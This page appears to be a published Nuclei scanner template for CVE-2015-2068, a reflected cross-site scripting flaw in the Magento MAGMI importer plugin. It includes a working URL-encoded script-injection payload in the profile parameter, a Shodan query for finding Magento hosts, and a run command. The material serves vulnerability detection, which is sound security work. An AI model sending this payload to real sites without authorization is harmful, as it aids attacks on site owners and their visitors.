Skip to content

Magento Server Mass Importer - Cross-Site Scripting

ID: CVE-2015-2068

Severity: medium

Author: daffainfo

Tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server

Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.

id: CVE-2015-2068
info:
name: Magento Server Mass Importer - Cross-Site Scripting
author: daffainfo
severity: medium
description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server.
remediation: |
Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module.
reference:
- https://www.exploit-db.com/exploits/35996
- http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2015-2068
cwe-id: CWE-79
epss-score: 0.00146
epss-percentile: 0.50455
cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
metadata:
verified: true
max-request: 1
vendor: magmi_project
product: magmi
framework: magento_server
shodan-query:
- http.component:"Magento"
- http.component:"magento"
tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server
http:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a004630440220180ace8ec059d29d10faee5e88029db97c0f4bbec84cfddbec322a7cdf74005e02206606156175ec4d4aae2a9bc4a336ecd95517e200c74ffcf19c9c42d0681103f9:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-2068.yaml"

View on Github